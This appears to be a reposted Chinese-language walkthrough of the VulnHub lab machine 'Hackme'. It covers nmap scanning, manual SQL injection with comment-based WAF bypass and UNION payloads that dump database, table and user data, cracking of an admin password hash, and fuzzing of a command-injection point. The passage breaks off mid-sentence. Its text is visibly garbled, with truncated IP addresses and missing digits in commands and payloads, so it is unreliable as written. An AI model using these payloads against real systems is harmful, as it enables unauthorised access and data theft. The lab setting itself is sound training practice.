kalilinux:9.68.0.30

宿主机：9.68.0.

靶机：Hackme（本次靶机为vulnhub上中等难度靶机）

测试流程分为两块，一是通过的web漏洞拿到webshell，二是通过webshell反弹出bashshell并提权

由于kali主机和靶机在同一个局域网。首先查看kalilinuxIP

再通过nmap扫描该网段

nmap-sP9.68.0./4

排除宿主机和kali的地址后，9这台主机很为可疑

获取主机的开放端口

nmap-p-9.68.0./4

发现开放有和80端口，说明搭建有web服务，打开查看如下：

.注册账号登录

发现为书籍查询系统

.功能测试

未输入内容点击查询可显示所有书籍，输入内容后可以进行模糊查询，盲猜存在SQL注入且查询语句如下：

SELECT*FROMBOOKSWHEREbook_nameLIKE{}%;

3.手工SQL注入测试

.SQL注入验证

说明存在SQLi

.查询当前数据库名称

ps：经尝试发现空格被waf所阻挡，使用注释的方式绕过

payload：c%/**/and/**/database()/**/like/**/

发现数据库函数被屏蔽

改为使用union进行尝试

3.先试探数据库字段数

payload：c%/**/union/**/select/**/,,3

发现该表字段数为3

4.查询数据库名称

payload：c%/**/union/**/select/**/database/**/(),,3

可知数据库名称为：webapphacking

5.查询数据库表名

payload:b%/**/union/**/select/**/group_concat(table_name),"","3"/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/

发现存在user表，下一步思路则为查询user表相关信息

6.查询user表字段信息

payload:b%/**/union/**/select/**/group_concat(column_name),"","3"/**/from/**/information_schema.columns/**/where/**/table_name/**/like/

7.查询user表中的数据

发现存在superadmin账号，密码md5破解可得为Uncrackable

4.查看管理页面

发现存在文件上传点，以及用户查询处存在命令执行

5.命令执行漏洞挖掘利用

使用burpsuite进行抓包，将数据包发送至Intruder模块进行fuzz测试

发现单引号包括部分（如id）的命令可以执行

cat命令执行不成功，推测空格会被替换，使用catwel
转载请注明原文网址：http://www.coolofsoul.com/hjpz/hjpz/24231.html